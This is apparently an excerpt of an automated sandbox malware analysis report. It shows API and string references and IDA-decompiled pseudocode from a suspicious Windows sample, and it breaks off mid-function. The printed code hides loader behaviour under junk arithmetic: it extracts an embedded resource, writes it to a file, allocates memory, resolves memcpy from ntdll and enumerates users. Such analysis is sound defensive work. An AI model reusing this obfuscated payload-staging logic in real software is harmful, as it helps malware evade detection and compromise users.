0x00428299
0x0042829d
0x004282a1
0x004282a1
0x00428287
0x00428272
0x0042825e
0x0042823f
0x004281f3
0x004282ad
0x00428147
0x00428147
0x0042814f
0x0042814f

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00424D33), ref: 0042813B
__mtterm.LIBCMT ref: 00428147

Part of subcall function 00427E80: DecodePointer.KERNEL32(00000006,004282A9,?,00424D33), ref: 00427E91
Part of subcall function 00427E80: TlsFree.KERNEL32(00000021,004282A9,?,00424D33), ref: 00427EAB
Part of subcall function 00427E80: DeleteCriticalSection.KERNEL32(00000000,00000000,773DF3A0,?,004282A9,?,00424D33), ref: 0042BC81
Part of subcall function 00427E80: _free.LIBCMT ref: 0042BC84
Part of subcall function 00427E80: DeleteCriticalSection.KERNEL32(00000021,773DF3A0,?,004282A9,?,00424D33), ref: 0042BCAB

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042815D
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042816A
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00428177
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00428184
TlsAlloc.KERNEL32(?,00424D33), ref: 004281D4
TlsSetValue.KERNEL32(00000000,?,00424D33), ref: 004281EF
__init_pointers.LIBCMT ref: 004281F9
EncodePointer.KERNEL32(?,00424D33), ref: 0042820A
EncodePointer.KERNEL32(?,00424D33), ref: 00428217
EncodePointer.KERNEL32(?,00424D33), ref: 00428224
EncodePointer.KERNEL32(?,00424D33), ref: 00428231
DecodePointer.KERNEL32(00428004,?,00424D33), ref: 00428252
__calloc_crt.LIBCMT ref: 00428267
DecodePointer.KERNEL32(00000000,?,00424D33), ref: 00428281
GetCurrentThreadId.KERNEL32 ref: 00428293

Strings

KERNEL32.DLL, xrefs: 00428136
FlsFree, xrefs: 00428179
FlsGetValue, xrefs: 0042815F
FlsSetValue, xrefs: 0042816C
FlsAlloc, xrefs: 00428157

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: b8b8212be6dbc64f050e22af0f084ceea6db11544a83a5ab59b2f391dcbc1385
Instruction ID: f6c1037b94febada05ed2ed3ebbca05dcc7dd872c974fa0b240bbfce6afa7fa8
Opcode Fuzzy Hash: b8b8212be6dbc64f050e22af0f084ceea6db11544a83a5ab59b2f391dcbc1385
Instruction Fuzzy Hash: 5D319D70A017A0AAD720BFB5BC0565A7AE0EB44762B54467BF800C33B2EBB8C501CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00409058 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 181
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409058(struct HWND__* __ebx) {
				signed int _t389;
				struct HMENU__* _t398;
				void* _t404;
				signed short _t405;
				signed int _t410;
				signed int _t422;
				signed int _t423;
				CHAR* _t440;
				int _t445;
				void* _t452;
				void* _t455;
				int _t456;
				signed int _t460;
				signed int _t468;
				signed int _t469;
				struct HWND__* _t471;
				void* _t472;
				intOrPtr _t473;
				CHAR* _t474;
				signed short _t476;
				struct HWND__* _t479;
				signed int _t490;
				int _t494;
				signed int _t495;
				long _t501;
				void* _t503;
				int _t505;
				long _t512;
				signed int _t513;
				signed int _t518;
				int _t532;
				signed int _t536;
				long _t539;
				long _t540;
				int _t562;
				char* _t565;
				struct HWND__* _t567;
				signed int _t568;
				signed int _t574;
				int _t579;
				int _t583;
				int _t584;
				WCHAR* _t586;
				signed int _t588;
				int _t591;
				signed int _t596;
				struct HWND__* _t597;
				long _t598;
				void* _t601;
				signed int _t605;
				CHAR* _t606;
				signed int _t610;
				int _t612;
				struct HWND__* _t613;
				int _t620;
				long _t625;
				CHAR* _t628;
				signed int _t630;
				int _t638;
				struct HWND__* _t642;
				int _t646;
				signed char _t648;
				int _t649;
				int _t651;
				struct HRSRC__* _t652;
				void* _t653;
				long _t659;
				signed short _t660;
				void* _t663;
				struct tagRECT _t664;
				struct HDC__* _t665;
				void* _t666;
				signed int _t670;
				void* _t674;
				struct HWND__* _t679;
				void* _t681;
				signed int _t682;
				signed int _t692;
				signed int _t706;
				void _t710;
				struct HWND__* _t711;
				signed int _t713;
				struct HWND__* _t720;
				struct HWND__* _t722;
				signed int _t724;
				int _t731;
				signed int _t739;
				intOrPtr _t740;
				int _t745;
				long _t746;
				int _t752;
				int _t753;
				signed int _t754;
				int _t755;
				signed char _t759;
				long _t764;
				char* _t765;
				CHAR* _t767;
				int _t769;
				long _t771;
				long _t773;
				CHAR* _t775;
				long _t781;
				signed int _t786;
				long _t791;
				long _t792;
				signed short _t797;
				int _t805;
				char* _t807;
				int _t808;
				intOrPtr _t818;
				signed int _t819;
				int _t821;
				struct HWND__* _t825;
				void* _t836;
				long _t850;
				int _t859;
				struct HWND__* _t864;
				int _t865;
				intOrPtr _t869;
				signed int _t878;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				int _t886;
				int _t887;
				signed int _t890;
				signed int _t891;
				long _t892;
				intOrPtr _t893;
				signed int _t896;
				signed int _t897;
				int _t898;
				void* _t901;
				WCHAR* _t902;
				struct HDC__* _t904;
				HMIDIIN* _t905;
				int _t907;
				signed int _t908;
				signed int _t912;
				int _t913;
				signed int _t914;
				signed int _t915;
				struct HWND__* _t917;
				long _t918;
				signed int _t919;
				signed int _t922;
				void* _t925;
				intOrPtr _t926;
				struct HDC__* _t927;
				int _t928;
				struct HWND__* _t930;
				struct HWND__* _t931;
				struct HWND__* _t932;
				signed int _t933;
				signed int _t934;
				short* _t935;
				int _t936;
				signed int _t937;
				void* _t939;
				void* _t953;
				void* _t954;
				void* _t956;

				_t642 = __ebx;
				L1:
				while(1) {
					if( *0x4631e4 != 0) {
						L31:
						_t681 =  *(_t937 - 0x24) + 1;
						 *(_t937 - 0x24) = _t681;
						_t389 =  *0x4631fc; // 0x789
						asm("cdq");
						_t786 = _t786 & 0x00000003;
						if(_t681 >= _t389 + _t786 >> 2) {
							_t682 =  *0x4631e8; // 0x789
							_t907 = 0;
							_t890 =  *0x4631f0; // 0x3b8402f
							__eflags = _t890;
							if(_t890 != 0) {
								__eflags =  *0x4631fc - _t907; // 0x789
								if(__eflags != 0) {
									__eflags = _t682;
									if(_t682 != 0) {
										_t884 =  *0x463210; // 0x0
										_t610 = _t884 * 4 -  *0x46320c +  *0x4631e4;
										__eflags = _t610;
										_t885 =  *0x463204; // 0x4
										_t39 = _t610 + 4; // 0x8
										 *0x463204 = _t885 + _t39;
									}
								}
							}
							 *0x462b3c = (0x2e8ba2e9 * _t682 >> 0x20 >> 3 >> 0x1f) + (0x2e8ba2e9 * _t682 >> 0x20 >> 3) - (0x2e8ba2e9 *  *0x462f60 >> 0x20 >> 1 >> 0x1f) + (0x2e8ba2e9 *  *0x462f60 >> 0x20 >> 1) + _t890;
							_t646 =  *(_t937 - 0x40);
							_t791 =  *0x46320c; // 0x0
							 *(_t937 + 0x574) = _t791;
							E00422B80(_t937 + 0x575, _t907, 0x103);
							_t939 = _t939 + 0xc;
							 *(_t937 + 0xc) = 0x30;
							 *(_t937 + 0x10) = 0x17;
							 *(_t937 + 0x14) = _t907;
							 *(_t937 + 0x18) = _t907;
							 *(_t937 + 0x30) = _t937 + 0x574;
							 *(_t937 + 0x34) = 0x104;
							_t792 =  *0x4631d8; // 0xfff48ebd
							 *(_t937 + 0x1c) = _t792;
							_t398 =  *0x46320c; // 0x0
							 *(_t937 + 0x20) = _t398;
							InsertMenuItemA(_t398, _t398, _t907, _t937 + 0xc);
							 *(_t937 - 0x30) = _t907;
							 *(_t937 - 0x28) = _t907;
							lstrcpyW(_t937 + 0x6b0, L"\\\\");
							NetUserEnum(_t937 + 0x6b0, _t907, _t907, _t937 - 0x30, 0x2580, _t937 - 0x20, _t937 - 0x38, _t937 - 0x28); // executed
							 *(_t937 - 0x24) = _t907;
							__eflags =  *(_t937 - 0x20) + 5;
							if( *(_t937 - 0x20) + 5 == 0) {
								_t692 =  *0x4631f4; // 0xfff48ebd
								goto L50;
							} else {
								do {
									_t935 =  *0x4631d8; // 0xfff48ebd
									_t586 =  *0x4631dc; // 0x2ad58
									lstrlenW(_t586);
									_t588 =  *0x4631fc; // 0x789
									_t771 =  *0x46320c; // 0x0
									 *0x460334 =  &(( *0x460334)[_t771 + (_t588 +  *0x4631d8) * 2 + _t588 +  *0x4631d8]);
									 *0x463210 = ImageList_DragMove(0, 0);
									_t591 =  *0x4631e4; // 0x0
									_t646 = _t646 + (_t591 + 1) *  *0x4631f4;
									 *(_t937 - 0x1c) = _t646;
									lstrcpyA(_t937 + 0x268, "empty");
									 *(_t937 - 0x20) = 0;
									PathCompactPathA(0, 0, 0);
									 *0x4631ec = 0;
									__eflags = _t935;
									if(_t935 != 0) {
										_t596 = lstrlenW(_t935); // executed
										__eflags = _t596;
										if(_t596 != 0) {
											_t597 =  *0x463210; // 0x0
											_t84 = _t597 + 5; // 0x5
											_t773 =  *0x46320c; // 0x0
											_t85 = _t773 + 1; // 0x1
											_t878 = (_t84 * _t85 * 4 - 1) * (0x14 - _t773) -  *0x462f60 + _t597;
											__eflags = _t878;
											_t598 =  *0x4631d8; // 0xfff48ebd
											_t89 = _t878 + 0x1d1; // 0xfff4908e
											 *0x4631d8 = _t598 + _t89;
											WideCharToMultiByte(0, 0, _t935, 0xffffffff, _t937 + 0x36c, 0x100, 0, 0);
											_t646 =  *(_t937 - 0x1c);
											L46:
											_t692 =  *0x4631f4; // 0xfff48ebd
											goto L47;
										}
										lstrcpyA(_t937 + 0x36c, ")");
										_t775 =  *0x460334; // 0xc30c4
										_t692 =  &(_t775[ *0x4631dc]) * (_t646 - 2);
										 *0x4631f4 = _t692;
										goto L47;
									}
									_t605 =  *0x46320c; // 0x0
									_t882 = _t605 + _t605 * 4;
									_t606 =  *0x460334; // 0xc30c4
									_t79 = _t882 * 2; // 0xc32c0
									 *0x460334 =  &(_t606[_t79 + 0x1fc]);
									lstrcpyA(_t937 + 0x36c, "(");
									goto L46;
									L47:
									_t601 =  *(_t937 - 0x24) + 1;
									 *(_t937 - 0x24) = _t601;
									__eflags = _t601 -  *(_t937 - 0x20) + 5;
								} while (_t601 <  *(_t937 - 0x20) + 5);
								_t907 = 0;
								L50:
								_t404 =  *(_t937 - 0x30);
								__eflags = _t404 - _t907;
								if(_t404 != _t907) {
									NetApiBufferFree(_t404);
									_t692 =  *0x4631f4; // 0xfff48ebd
								}
								_t908 =  *0x463210; // 0x0
								_t405 =  *0x462b40; // 0xfffffe1c
								_t797 =  *0x463200; // 0x211
								_t891 =  *0x462f68; // 0x211
								 *0x462f68 = _t908 * _t405 + _t797 + _t891 * 2;
								_t912 =  *0x46320c; // 0x0
								_t892 =  *0x4631d8; // 0xfff48ebd
								_t99 = _t892 + 1; // 0x1
								_t648 = (_t912 + _t99) *  *0x4631dc;
								 *0x4631d8 = _t648;
								 *0x462f90 = "Originally thought inhere Decrement ";
								_t893 =  *0x462f8c; // 0x4770000
								__eflags = _t893 - (_t405 & 0x0000ffff) -  *0x462740; // 0x3c3fbd7
								if(__eflags == 0) {
									_t692 = ( *0x462f64 & 0x0000ffff) -  *0x463204;
									__eflags = _t692;
								}
								_t100 = _t797 + 0x53; // 0x264
								asm("cdq");
								 *0x463208 = _t648 / _t100 *  *0x462f64;
								_t410 =  *0x462b44; // 0x0
								 *0x462b3c = (_t648 & 0x000000ff) * _t912 + _t410 *  *0x462b3c -  *0x4631ec;
								_t896 =  *0x4631dc; // 0x2ad58
								__eflags = _t896;
								if(_t896 != 0) {
									_t869 =  *0x462744; // 0x0
									_t670 = _t648 + _t869 -  *0x462f60;
									__eflags = _t670;
									 *0x4631d8 = _t670;
								}
								_t805 = (0x8d3dcb09 * _t692 >> 0x20) + _t692 >> 4;
								__eflags = (_t805 >> 0x1f) + _t805 -  *0x463204 -  *0x462f8c; // 0x4770000
								if(__eflags <= 0) {
									_t805 = 0x2b48 * _t912;
									_t897 = _t896 - _t805;
									__eflags = _t897;
									 *0x4631f4 = _t897;
								} else {
									 *0x4631f4 = _t912;
								}
								_t898 = CreateFontW( ~(MulDiv(0xa, 0x60, 0x48)), 0, 0, 0, 0x190, 0, 0, 0, 0x80, 0, 0, 0, 0, L"MS Shell Dlg");
								_t913 = 0;
								__eflags = _t898;
								if(_t898 != 0) {
									_t913 = 1;
								}
								_t422 = CreateWindowExA(0, "BUTTON", "Id", 0x50000000, 0, 0, 0, 0, _t898, 1, GetModuleHandleA(0), 0); // executed
								 *(_t937 - 0x20) = _t422;
								__eflags = _t422;
								if(_t422 != 0) {
									_t914 = _t913 + 0x10;
									__eflags = _t914;
								} else {
									_t914 = _t913 +  *0x46320c;
								}
								 *(_t937 - 0x1c) = _t914;
								_t423 = _t914;
								asm("cdq");
								_t915 = _t423;
								_t649 = _t805;
								 *(_t937 - 0x5c) = _t423 + 0x7a4101d3;
								asm("adc eax, 0xb74048f7");
								 *(_t937 - 0x58) = _t649;
								 *(_t937 - 0x54) = 0xcf56a7d7 - _t915;
								asm("sbb eax, ebx");
								 *((intOrPtr*)(_t937 - 0x50)) = 0x31fd1da7;
								 *(_t937 - 0x2c) = E00423BC0(_t915, _t649, 0xcab19233, 0xf3be2527);
								 *(_t937 - 0x28) = _t805;
								 *(_t937 - 0x48) = _t915;
								 *(_t937 - 0x44) = _t649;
								asm("cdq");
								 *((intOrPtr*)(_t937 + 0x48)) =  *(_t937 - 0x1c) + 8;
								 *(_t937 + 0x4c) = _t805;
								 *(_t937 - 0x24) = SendMessageA( *(_t937 - 0x20), 0x30, _t898, 0);
								_t807 =  *(_t937 - 0x5c);
								 *((intOrPtr*)(_t937 - 0x34)) = E00423BC0( *(_t937 - 0x54),  *((intOrPtr*)(_t937 - 0x50)), _t807,  *(_t937 - 0x58));
								 *(_t937 - 0x30) = _t807;
								_t808 =  *(_t937 - 0x28);
								 *(_t937 - 0x2c) = E00423BC0(_t915, _t649,  *(_t937 - 0x2c), _t808) +  *((intOrPtr*)(_t937 - 0x34));
								asm("adc edx, [ebp-0x30]");
								 *(_t937 - 0x28) = _t808;
								_t651 = E00423BC0(_t915, _t649, 0xd0b1961e, 0x2f71a37) +  *((intOrPtr*)(_t937 - 0x34));
								asm("adc edx, [ebp-0x30]");
								 *(_t937 + 0x5c) = _t808;
								_t917 = _t915 *  *(_t937 - 0x1c) + 0x636f6c6b;
								_t440 = GlobalAlloc(0x40, 0x20);
								__eflags =  *(_t937 - 0x24);
								if( *(_t937 - 0x24) == 0) {
									 *_t440 =  *(_t937 - 0x2c);
									_t440[4] =  *(_t937 - 0x28);
									 *(_t937 - 0x30) = LoadLibraryA(_t440);
									 *(_t937 - 0x24) = EnableWindow( *(_t937 - 0x20), 0);
									 *(_t937 - 0x28) = GlobalAlloc(0x40, 0x20);
									__eflags =  *(_t937 - 0x24);
									if( *(_t937 - 0x24) == 0) {
										_t445 =  *(_t937 - 0x28);
										 *_t445 = _t651;
										 *(_t445 + 4) =  *(_t937 + 0x5c);
										DefDlgProcA( *(_t937 - 0x20),  *(_t937 - 0x48),  *(_t937 - 0x5c),  *(_t937 - 0x54));
										_t652 = FindResourceA(0, "open", "file");
										__eflags = _t652;
										if(_t652 == 0) {
											_t584 =  *(_t937 - 0x28);
											 *(_t584 + 8) = _t917;
											 *(_t584 + 0xc) = _t652;
										}
										_t918 = SizeofResource(0, _t652);
										 *(_t937 - 0x24) = LockResource(LoadResource(0, _t652));
										_t452 = CreateFileA("close", 0x40000000, 0, 0, 3, 0x80, 0); // executed
										_t653 = _t452;
										__eflags = _t653 - 0xffffffff;
										if(_t653 == 0xffffffff) {
											 *(_t937 - 0x30) = GetProcAddress( *(_t937 - 0x30),  *(_t937 - 0x28));
										} else {
											_t583 =  *0x4631e4; // 0x0
											 *_t583 = 0x1ced36d;
										}
										_t455 = WriteFile(_t653,  *(_t937 - 0x24), _t918, _t937 - 0x38, 0); // executed
										__eflags = _t455;
										if(_t455 != 0) {
											_t456 =  *0x4631e4; // 0x0
											 *_t456 = 0x1ced36d;
										} else {
											 *0x462f8c = VirtualAlloc(_t455, 0x37000, 0x3000,  *((intOrPtr*)(_t937 + 0x48)) + 0x37);
										}
										CloseHandle(_t653);
										_t919 =  *0x4628af; // 0x0
										_t460 =  *0x460334; // 0xc30c4
										 *0x4631f4 = (0x63e7063f *  *0x463208 >> 0x20 >> 4 >> 0x1f) + _t919 *  *0x462a28 + (0x63e7063f *  *0x463208 >> 0x20 >> 4) + ( *0x4631d8 & 0x0000ffff) - _t460;
										_t706 =  *0x462b2c; // 0x0
										__eflags = ( *0x4631e4 & 0x0000ffff) *  *0x4631ec - _t706 * _t460 + ( *0x4631fc & 0x000000ff);
										if(( *0x4631e4 & 0x0000ffff) *  *0x4631ec != _t706 * _t460 + ( *0x4631fc & 0x000000ff)) {
											 *0x462f6c = 0;
										}
										_t922 = LoadBitmapA( *(_t937 - 0x40), 0x462a28);
										 *(_t937 + 0x50) = 0x6d656d;
										 *((intOrPtr*)(_t937 + 0x54)) = 0;
										 *(_t937 + 0x58) = 0;
										 *(_t937 + 0x5c) = 0;
										__eflags = _t922;
										if(_t922 == 0) {
											lstrcatA(_t937 + 0x50, "cpy");
										}
										 *(_t937 - 0x24) = GetProcAddress(LoadLibraryA("ntdll"), _t937 + 0x50);
										_t468 =  *0x4631fc; // 0x789
										__eflags = _t468 - _t922;
										if(_t468 >= _t922) {
											_t177 = _t922 + 1; // 0x1
											__eflags =  *0x463210 - _t177;
											if( *0x463210 != _t177) {
												_t710 =  *0x46320c; // 0x0
												_t818 =  *0x462f8c; // 0x4770000
												_t819 = _t818 + _t710;
												__eflags = _t819;
												 *0x462f5c = _t819;
											} else {
												_t767 =  *0x460334; // 0xc30c4
												 *0x462f5c =  &(_t767[ *0x4631d8]);
												_t710 =  *0x46320c; // 0x0
											}
										} else {
											_t769 =  *0x4631f0; // 0x3b8402f
											 *0x462f5c = _t769;
											_t710 =  *0x46320c; // 0x0
										}
										_t179 = _t710 + 3; // 0x3
										_t180 = _t710 + 1; // 0x1
										_t469 =  *0x4631ec; // 0x0
										_t471 =  *0x463210; // 0x0
										_t659 = (_t180 * _t468 + _t469 *  *0x4631d8 - _t471) * (_t710 + _t179) +  *0x463204;
										 *(_t937 - 0x38) = _t659;
										_t821 = 0;
										__eflags = _t922;
										if(_t922 != 0) {
											L88:
											_t472 =  *0x462f5c; // 0x4770000
											 *_t472 = _t710;
											goto L89;
										} else {
											__eflags =  *0x4631ec - _t821; // 0x0
											if(__eflags != 0) {
												goto L88;
											}
											_t183 = _t710 + 0x45d300; // 0x45d300
											_t865 =  *0x462f5c; // 0x4770000
											_t472 =  *(_t937 - 0x24)(_t865, _t471 + _t183, _t659);
											_t939 = _t939 + 0xc;
											_t821 = 0;
											L89:
											_t711 =  *0x4631ec; // 0x0
											__eflags =  *0x46320c - _t711 +  *0x463210; // 0x0
											if(__eflags != 0) {
												L101:
												_t473 = 0;
												__eflags =  *0x4631fc - _t821; // 0x789
												if(__eflags != 0) {
													_t473 = _t937 - 0x40;
												}
												__eflags =  *0x463210 - _t821; // 0x0
												if(__eflags == 0) {
													_t752 =  *0x462f5c; // 0x4770000
													 *((intOrPtr*)(_t752 + 1)) = _t473;
												}
												__eflags =  *(_t937 - 0x40) - _t821;
												if( *(_t937 - 0x40) != _t821) {
													L111:
													_t713 =  *0x462f60; // 0x3b8402f
													 *0x462740 = _t713 -  *0x4631f4 -  *0x462740 +  *0x462b40;
													_t474 =  *0x460334; // 0xc30c4
													 *0x462f6c =  *0x462f6c -  &(_t474[ *0x463210]);
													_t476 =  *0x463200; // 0x211
													__eflags = (_t476 & 0x0000ffff) +  *0x462f64;
													if((_t476 & 0x0000ffff) +  *0x462f64 != 0) {
														_t244 = _t476 + 0x3a; // 0x24b
														_t518 =  *0x4631dc; // 0x2ad58
														asm("cdq");
														 *0x462b34 =  *0x462b34 + (0xb13b13b1 *  *0x462f7c >> 0x20 >> 2 >> 0x1f) + (0xb13b13b1 *  *0x462f7c >> 0x20 >> 2) - _t518 / _t244 -  *0x463208;
														_t821 = 0;
														__eflags = 0;
													}
													__eflags =  *0x46320c - _t821; // 0x0
													if(__eflags == 0) {
														L162:
														GetLocalTime(_t937 + 0x50);
														GetTimeFormatW(0x400, 2, _t937 + 0x50, 0, _t937 + 0x470, 0x104);
														_t479 =  *0x463210; // 0x0
														SendMessageW(_t479, 0xc2, 1, _t937 + 0x470);
														_t720 =  *0x4631ec; // 0x0
														SendMessageW(_t720, 0xc2, 1, " ");
														GetDateFormatW(0x400, 0, _t937 + 0x50, 0, _t937 + 0x470, 0x104);
														_t825 =  *0x463210; // 0x0
														SendMessageW(_t825, 0xc2, 1, _t937 + 0x470);
														 *(_t937 - 0x38) = 1;
														 *((intOrPtr*)(_t937 - 4)) = 0;
														__eflags = (0x66666667 *  *0x463204 >> 0x20 >> 1 >> 0x1f) + (0x66666667 *  *0x463204 >> 0x20 >> 1) -  *0x46320c; // 0x0
														if(__eflags >= 0) {
															 *0x4631d8 =  *0x4631e4 & 0x0000ffff;
														}
														_t722 =  *0x463210; // 0x0
														_t490 =  *0x4631fc; // 0x789
														asm("cdq");
														_t724 =  *0x4631f4; // 0xfff48ebd
														 *0x4631d8 = _t724 *  *0x4631e4 - _t490 / (_t722 + 0x5e) * (_t724 & 0x000000ff);
														 *(_t937 - 0x4c) = 0x5c;
														while(1) {
															__eflags = 1 -  *0x46320c; // 0x0
															if(__eflags >= 0) {
																_t660 =  *0x463200; // 0x211
																_t724 = _t724 + 1 / (_t660 + 0x45) * 0 -  *0x462f60 -  *0x4631fc +  *0x4631ec;
																__eflags = _t724;
																 *0x4631f4 = _t724;
															}
															_t833 =  *0x462f5c; // 0x4770000
															__eflags = _t833 -  *0x4631dc; // 0x2ad58
															if(__eflags > 0) {
																_t495 =  *0x4631e8; // 0x789
																_t833 = 1 + _t495;
																 *0x462f5c = 1 + _t495;
															}
															__eflags = _t724 -  *0x460334; // 0xc30c4
															if(__eflags > 0) {
																_t494 =  *0x463204; // 0x4
																 *0x462f5c = _t494;
															}
															HideCaret(0);
															_t383 = _t937 - 0x4c;
															 *_t383 =  *(_t937 - 0x4c) - 1;
															__eflags =  *_t383;
															if( *_t383 == 0) {
																break;
															}
															_t724 =  *0x4631f4; // 0xfff48ebd
														}
														 *((intOrPtr*)(_t937 - 4)) = 0xfffffffe;
														goto L175;
													} else {
														_t926 =  *0x463214; // 0x0
														_t927 = _t926 + 1;
														 *(_t937 - 0x30) = _t927;
														_t503 =  *0x46320c; // 0x0
														 *(_t937 - 0x24) = _t503;
														__eflags = _t503 - _t821;
														if(_t503 != _t821) {
															StartPage(_t927);
														}
														GetTextMetricsW(_t927, _t937 + 0x73c);
														_t928 =  *(_t937 + 0x5c);
														_t902 =  *(_t937 + 0x58);
														_t664 =  *(_t937 + 0x50);
														do {
															__eflags = _t928;
															if(_t928 != 0) {
																L134:
																__eflags =  *0x46320c;
																if( *0x46320c == 0) {
																	_t505 = _t928;
																	L144:
																	 *(_t937 - 0x28) = _t505;
																	L145:
																	__eflags =  *(_t937 - 0x24);
																	if( *(_t937 - 0x24) != 0) {
																		ExtTextOutW( *(_t937 - 0x30),  *(_t937 + 0x40),  *(_t937 - 0x1c), 4, _t937 + 0x40, _t902, _t505, 0);
																		_t505 =  *(_t937 - 0x28);
																	}
																	_t928 = _t928 - _t505;
																	__eflags = _t928;
																	if(_t928 == 0) {
																		_t731 =  *(_t937 - 0x1c);
																		__eflags = _t664 -  *((intOrPtr*)(_t937 + 0x54));
																		if(_t664 >=  *((intOrPtr*)(_t937 + 0x54))) {
																			break;
																		}
																		_t836 =  *(_t937 + 0x73c);
																		while(1) {
																			__eflags = _t731 -  *(_t937 - 0x38);
																			if(_t731 >=  *(_t937 - 0x38)) {
																				break;
																			}
																			_t513 =  *_t664 & 0x0000ffff;
																			__eflags = _t513 - 0xa;
																			if(_t513 == 0xa) {
																				L155:
																				_t731 = _t731 +  *(_t937 + 0x74c) + _t836;
																				__eflags = _t731;
																				L156:
																				_t664 = _t664 + 2;
																				__eflags = _t664 -  *((intOrPtr*)(_t937 + 0x54));
																				if(_t664 <  *((intOrPtr*)(_t937 + 0x54))) {
																					continue;
																				}
																				break;
																			}
																			__eflags = _t513 - 0xd;
																			if(_t513 != 0xd) {
																				break;
																			}
																			__eflags = _t513 - 0xa;
																			if(_t513 != 0xa) {
																				goto L156;
																			}
																			goto L155;
																		}
																		 *(_t937 - 0x1c) = _t731;
																		goto L158;
																	} else {
																		E004224A0(_t902,  &(_t902[_t505]), _t928 + _t928);
																		_t939 = _t939 + 0xc;
																		 *(_t937 - 0x1c) =  *(_t937 - 0x1c) +  *(_t937 + 0x74c) +  *(_t937 + 0x73c);
																		_t731 =  *(_t937 - 0x1c);
																		L158:
																		__eflags = _t664 -  *((intOrPtr*)(_t937 + 0x54));
																		if(_t664 >=  *((intOrPtr*)(_t937 + 0x54))) {
																			break;
																		}
																		goto L159;
																	}
																}
																GetTextExtentExPointW( *(_t937 - 0x30), _t902, _t928,  *((intOrPtr*)(_t937 + 0x48)) -  *(_t937 + 0x40), _t937 - 0x28, 0, _t937 + 0x58);
																_t505 =  *(_t937 - 0x28);
																__eflags = _t505 - _t928;
																if(_t505 >= _t928) {
																	goto L145;
																}
																__eflags = _t902[_t505] - 0x20;
																if(_t902[_t505] == 0x20) {
																	goto L145;
																}
																_t739 = _t505;
																__eflags = _t505;
																if(_t505 == 0) {
																	L141:
																	__eflags = _t739;
																	if(_t739 <= 0) {
																		goto L145;
																	}
																	_t505 = _t739 + 1;
																	goto L144;
																}
																while(1) {
																	__eflags = _t902[_t739] - 0x20;
																	if(_t902[_t739] == 0x20) {
																		goto L141;
																	}
																	_t739 = _t739 - 1;
																	__eflags = _t739;
																	if(_t739 != 0) {
																		continue;
																	}
																	goto L141;
																}
																goto L141;
															}
															_t740 =  *((intOrPtr*)(_t937 + 0x54));
															__eflags = _t664 - _t740;
															if(_t664 >= _t740) {
																goto L134;
															}
															while(1) {
																_t512 =  *_t664 & 0x0000ffff;
																__eflags = _t512 - 0xa;
																if(_t512 == 0xa) {
																	goto L134;
																}
																__eflags = _t512 - 0xd;
																if(_t512 == 0xd) {
																	goto L134;
																}
																__eflags = _t512 - 9;
																if(_t512 != 9) {
																	__eflags = _t928 - 4;
																	if(_t928 >= 4) {
																		goto L134;
																	}
																	L131:
																	_t902[_t928] = _t512;
																	_t928 = _t928 + 1;
																	__eflags = _t928;
																	L132:
																	__eflags = _t928 - 4;
																	if(_t928 >= 4) {
																		goto L134;
																	}
																	_t664 = _t664 + 2;
																	__eflags = _t664 - _t740;
																	if(_t664 < _t740) {
																		continue;
																	}
																	goto L134;
																}
																__eflags = _t928 -  *0x46320c; // 0x0
																if(__eflags >= 0) {
																	goto L132;
																}
																_t902[_t928] = 0x20;
																_t928 = _t928 + 1;
																__eflags = _t928 -  *0x46320c; // 0x0
																if(__eflags >= 0) {
																	goto L132;
																}
																_t512 = 0x20;
																_t902[_t928] = 0x20;
																_t928 = _t928 + 1;
																__eflags = _t928 -  *0x46320c; // 0x0
																if(__eflags >= 0) {
																	goto L132;
																}
																_t902[_t928] = 0x20;
																_t928 = _t928 + 1;
																__eflags = _t928 -  *0x46320c; // 0x0
																if(__eflags >= 0) {
																	goto L132;
																}
																goto L131;
															}
															goto L134;
															L159:
															__eflags = _t731 -  *(_t937 - 0x38);
														} while (_t731 <  *(_t937 - 0x38));
														__eflags =  *(_t937 - 0x24);
														if( *(_t937 - 0x24) != 0) {
															EndPage( *(_t937 - 0x30));
														}
														goto L162;
													}
												} else {
													 *(_t937 + 0x73c) = 0x3c;
													 *(_t937 + 0x740) = _t821;
													 *(_t937 + 0x744) = _t821;
													 *(_t937 + 0x748) = _t937;
													 *(_t937 + 0x74c) = _t821;
													 *(_t937 + 0x750) = 1;
													 *(_t937 + 0x754) = _t821;
													 *(_t937 + 0x758) = _t821;
													 *(_t937 + 0x75c) = _t821;
													 *(_t937 + 0x760) = _t821;
													 *(_t937 + 0x764) = _t821;
													 *(_t937 + 0x768) = _t821;
													 *((short*)(_t937 + 0x76c)) = 0x2000;
													 *(_t937 + 0x770) = _t821;
													 *(_t937 + 0x774) = _t821;
													__eflags =  *0x46320c - _t821; // 0x0
													if(__eflags != 0) {
														ChooseFontA(_t937 + 0x73c);
													}
													CreateFontIndirectA( *(_t937 + 0x748));
													_t930 =  *0x4631ec; // 0x0
													_t665 = BeginPaint(_t930, _t937 + 0x738);
													_t833 =  *(_t937 - 0x38);
													SelectObject(_t665,  *(_t937 - 0x38));
													_t532 =  *0x46320c; // 0x0
													TextOutA(_t665, 0, 0, 0x462a28, _t532);
													EndPaint(_t930, _t937 + 0x738);
													_t666 =  *(_t937 - 0x40);
													_t931 =  *0x4631ec; // 0x0
													_t745 =  *0x46320c; // 0x0
													_t536 = _t745 - 1;
													__eflags = _t536;
													if(_t536 == 0) {
